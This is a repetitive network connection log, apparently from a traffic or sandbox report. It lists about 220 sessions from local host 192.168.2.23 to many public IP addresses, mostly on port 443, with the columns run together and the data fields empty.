                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18416192.168.2.235992083.10.54.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18417192.168.2.235697242.68.207.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18418192.168.2.234030240.229.186.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18419192.168.2.235091219.250.57.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18420192.168.2.2337564160.254.194.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18421192.168.2.234860440.42.59.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18422192.168.2.2355514109.216.240.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18423192.168.2.2355148108.100.246.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18424192.168.2.235688074.209.82.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18425192.168.2.2348860141.128.199.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18426192.168.2.233407242.140.101.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18427192.168.2.2358752182.92.145.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18428192.168.2.2354488222.242.71.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18429192.168.2.235918648.73.225.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18430192.168.2.2346608187.223.208.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18431192.168.2.2353956177.72.152.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18432192.168.2.235341012.240.136.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18433192.168.2.2337812178.251.174.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18434192.168.2.2351146170.156.40.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18435192.168.2.2333530115.24.27.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18436192.168.2.2335918163.47.136.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18437192.168.2.2336198132.44.133.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18438192.168.2.234339214.115.226.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18439192.168.2.2353406164.107.251.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18440192.168.2.235278488.2.141.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18441192.168.2.2336656132.35.123.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18442192.168.2.2348832121.227.120.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18443192.168.2.2354560174.39.241.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18444192.168.2.2338042205.23.49.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18445192.168.2.233798861.225.190.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18446192.168.2.2352122157.218.253.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18447192.168.2.2360822139.21.74.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18448192.168.2.233424852.25.83.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18449192.168.2.234080652.116.22.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18450192.168.2.2354946156.42.217.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18451192.168.2.2356578212.146.17.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18452192.168.2.2338030157.205.248.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18453192.168.2.23401668.52.200.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18454192.168.2.2337050154.68.95.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18455192.168.2.236000820.202.218.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18456192.168.2.2336046208.249.125.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18457192.168.2.233304873.183.95.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18458192.168.2.233446479.104.229.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18459192.168.2.235172691.69.94.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18460192.168.2.2344526178.114.211.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18461192.168.2.233900094.17.105.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18462192.168.2.2347178164.176.29.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18463192.168.2.23413884.138.15.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18464192.168.2.2345948219.79.198.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18465192.168.2.2357604143.183.246.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18466192.168.2.234754032.191.232.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18467192.168.2.235243091.30.186.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18468192.168.2.233852427.40.221.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18469192.168.2.2360332203.230.242.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18470192.168.2.235140688.100.62.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18471192.168.2.235148263.104.207.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18472192.168.2.2349818204.3.222.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18473192.168.2.233354090.164.223.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18474192.168.2.235958660.114.90.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18475192.168.2.2344598187.146.145.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18476192.168.2.2334654110.148.91.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18477192.168.2.233571236.10.175.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18478192.168.2.234284269.228.42.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18479192.168.2.2360756134.122.35.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18480192.168.2.235122268.38.201.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18481192.168.2.2360844121.225.1.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18482192.168.2.2344798116.191.136.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18483192.168.2.2350442188.15.0.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18484192.168.2.2352238125.31.249.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18485192.168.2.234304418.251.94.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18486192.168.2.235870666.136.160.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18487192.168.2.2354630211.119.178.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18488192.168.2.2341494211.92.73.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18489192.168.2.235571658.172.186.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18490192.168.2.234839654.104.64.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18491192.168.2.2345218203.150.81.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18492192.168.2.235857081.106.225.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18493192.168.2.235801042.53.146.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18494192.168.2.233703617.179.139.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18495192.168.2.2357838136.246.226.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18496192.168.2.2346698172.117.211.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18497192.168.2.2358194169.31.219.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18498192.168.2.2342088136.228.170.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18499192.168.2.2357580196.180.200.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18500192.168.2.2358808185.252.205.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18501192.168.2.2345168113.248.200.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18502192.168.2.2351572144.96.133.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18503192.168.2.2342378188.40.236.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18504192.168.2.2333164170.214.120.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18505192.168.2.234070489.171.60.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18506192.168.2.2359406219.242.211.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18507192.168.2.235587062.149.116.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18508192.168.2.2360246172.11.106.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18509192.168.2.2354154125.60.194.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18510192.168.2.2355346211.108.115.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18511192.168.2.2345396219.242.104.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18512192.168.2.234798645.216.151.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18513192.168.2.233545660.128.76.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18514192.168.2.2340256200.78.54.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18515192.168.2.2337014180.217.225.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18516192.168.2.2338938195.231.22.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18517192.168.2.2357158112.13.76.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18518192.168.2.2348820207.30.255.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18519192.168.2.2337374109.169.77.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18520192.168.2.2343400141.24.219.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18521192.168.2.2343264194.38.49.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18522192.168.2.2356628111.15.126.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18523192.168.2.2344014100.136.199.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18524192.168.2.23547445.27.159.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18525192.168.2.235759491.224.35.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18526192.168.2.235928640.176.155.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18527192.168.2.2333382191.141.11.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18528192.168.2.2352932107.91.102.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18529192.168.2.2349444146.196.106.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18530192.168.2.2351710118.235.172.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18531192.168.2.23506661.12.76.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18532192.168.2.235886027.98.232.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18533192.168.2.2343240200.139.25.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18534192.168.2.2349494150.51.7.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18535192.168.2.23457085.230.78.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18536192.168.2.2341122180.249.70.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18537192.168.2.2337710179.63.50.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18538192.168.2.2337908112.50.172.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18539192.168.2.235387892.175.125.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18540192.168.2.2334894119.11.108.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18541192.168.2.23375049.103.236.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18542192.168.2.233680662.159.26.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18543192.168.2.2353258158.209.196.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18544192.168.2.234740859.207.9.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18545192.168.2.2355990165.240.89.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18546192.168.2.2338822156.207.159.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18547192.168.2.235782680.173.255.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18548192.168.2.235538218.100.51.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18549192.168.2.234123024.104.246.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18550192.168.2.2355884160.229.174.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18551192.168.2.2342532208.176.243.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18552192.168.2.2336746202.172.200.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18553192.168.2.2358432161.4.236.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18554192.168.2.23454044.113.24.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18555192.168.2.233834065.5.172.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18556192.168.2.235385863.139.173.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18557192.168.2.233476494.2.213.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18558192.168.2.235070624.166.171.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18559192.168.2.2358404222.69.248.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18560192.168.2.23527825.57.107.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18561192.168.2.2336654162.25.170.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18562192.168.2.2357692108.247.24.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18563192.168.2.235605086.88.235.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18564192.168.2.2348856119.24.101.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18565192.168.2.2356356219.252.163.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18566192.168.2.234113472.27.18.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18567192.168.2.2351116113.88.240.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18568192.168.2.2342630131.50.184.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18569192.168.2.2337010126.39.134.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18570192.168.2.2357864166.28.12.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18571192.168.2.233674665.243.73.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18572192.168.2.2356176116.123.55.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18573192.168.2.2349524196.118.199.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18574192.168.2.233804674.169.133.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18575192.168.2.2336338104.55.30.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18576192.168.2.2343270106.181.67.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18577192.168.2.2348318195.235.28.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18578192.168.2.234361825.171.159.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18579192.168.2.2342672114.54.55.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18580192.168.2.2342228140.175.156.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18581192.168.2.2360770125.128.210.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18582192.168.2.235822089.232.62.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18583192.168.2.2339766170.22.99.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18584192.168.2.2354862184.48.104.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18585192.168.2.2343730121.21.45.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18586192.168.2.2342386117.129.225.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18587192.168.2.235464095.99.142.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18588192.168.2.2333400216.204.205.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18589192.168.2.2358766123.103.216.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18590192.168.2.234156424.86.220.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18591192.168.2.23580789.232.77.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18592192.168.2.234395452.253.17.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18593192.168.2.2345932171.124.14.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18594192.168.2.2348266197.200.2.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18595192.168.2.2357140194.92.238.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18596192.168.2.234564259.217.178.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18597192.168.2.234473075.201.21.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18598192.168.2.233286099.52.121.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18599192.168.2.23398764.197.144.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18600192.168.2.2338736137.116.84.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18601192.168.2.2349392203.122.164.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18602192.168.2.2339738116.212.112.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18603192.168.2.2356438222.29.16.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18604192.168.2.2340052223.3.196.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18605192.168.2.2334698124.74.77.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18606192.168.2.2355216210.109.47.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18607192.168.2.2356760192.46.217.1908080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18608192.168.2.2355514153.169.25.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18609192.168.2.2343862115.237.203.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18610192.168.2.2352392168.11.84.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18611192.168.2.233421469.255.76.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18612192.168.2.2347904135.48.29.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18613192.168.2.235840419.9.91.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18614192.168.2.23375168.135.26.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18615192.168.2.2333954125.229.207.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18616192.168.2.234813491.22.250.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18617192.168.2.2360560113.169.47.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18618192.168.2.2358330134.124.64.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18619192.168.2.234468614.197.220.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18620192.168.2.2349634143.143.100.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18621192.168.2.2346936209.87.49.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18622192.168.2.2351598109.238.30.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18623192.168.2.2340304111.200.37.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18624192.168.2.235294617.241.191.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18625192.168.2.2342686120.155.165.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18626192.168.2.235533847.85.197.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18627192.168.2.2348570158.149.191.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18628192.168.2.235180090.95.86.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18629192.168.2.235785293.77.114.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18630192.168.2.2346620112.33.220.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18631192.168.2.2333796219.92.197.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18632192.168.2.234688094.208.219.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18633192.168.2.2360896218.123.244.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18634192.168.2.2349496121.169.127.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18635192.168.2.235744889.178.99.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18636192.168.2.234139290.167.97.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18637192.168.2.2354332204.88.247.55443
